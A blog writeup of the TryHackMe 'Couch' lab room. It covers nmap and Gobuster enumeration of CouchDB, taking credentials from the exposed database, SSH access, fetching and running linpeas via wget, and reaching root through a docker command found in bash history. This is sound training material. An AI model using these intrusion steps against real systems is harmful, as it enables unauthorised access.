This is my first writeup with a youtube video and its for the Try Hack Me couch room!
You can watch it here or continue reading below!
The Couch Writeup!
So, I decided on the couch room on Try Hack Me (Links at the bottom to the room)
This was an interesting room to complete as it has quite a clever predetermined path to privesc, maybe I just made it harder than I needed to….
The brief has a few additional steps, I identified 3 and if you follow the writeup you will be able to answer all those. The three I identified were.
- Find the credentials in the database
- Identify the User.txt flag
- Find the Root.txt flag
As always, i started out with an Nmap scan with the following parameters
nmap -sV -sC -p- -oN ./nmap/initial <THM_IP>
These are the results I got;
So no HTTP site on 80 but CouchDB on 5984, sometimes -p- on nmap is worth it!
Lets have a look at that http site on 5984.
2 options now I can either read the CouchDB technical documentation or I can see if Gobuster finds anything.
Lets try Gobuster first using the below;
gobuster dir -u http://<THM_IP>:5984 -w /usr/share/wordlists/dirbuster/big.txt # if you don't have a big.txt wordlist, you can substitute this for one you have
The results weren’t great……
So, lets amend our Gobuster command to;
gobuster dir -u http://<THM_IP>:5984 -w /usr/share/wordlists/dirbuster/big.txt -b 400,404 # Gobuster normall filters out 404 but if you use -b you have to put 404 back in there or it wont filter those out too
This looks better;
Use the _utils page and we will see whats in the database;
If you click through secret, you will find the credentials you need for Atena.
Atena and Her SSH
So, lets pretend to be Atena by using the below;
Obviously, we’re going to ls to see what Atena has in her home directory…..
The user flag is ours!
So being Atena was great and all, but we need root!
There’s a couple of options out there but I decided to upload linpeas and run it
// Start a webserver in the directory you have linpeas stored, take note of the port python3 -m http.server // From the THM Box side wget http://<Your_THM_IP>:<Your_Webserver_port>/linpeas.sh chmod +x linpeas.sh ./linpeas.sh
So after letting this run a couple of things stood out to me in addition to what linpeas was marking up;
- Docker was intalled and while not directly vulnerable, its not always on a THM Box
- Bash history was readable by the user
So lets sneakily read Atena’s history
There is a lot in there but that Docker command is interesting so lets copy it and run it!
So we are now inside a container.
From here i tried to cd to root with no luck so instead i tried the following
cd mnt ls cd root ls cat root.txt
We have it!
Try Hack Me Couch Conclusion
I did enjoy that box!
Maybe i went round the houses for the Privesc and should have just tried bash history first, but this is where a tool like linpeas really comes into its own because if it wasn’t that then id have been going down a different route.
I hope you enjoyed attempting this room too!
Go to Tryhackme.com for this and many more CTF’s
Room – TryHackMe Couch Room – Thank you to stuxnet for creating this!
Contact me – Any suggestions or room requests, get in touch!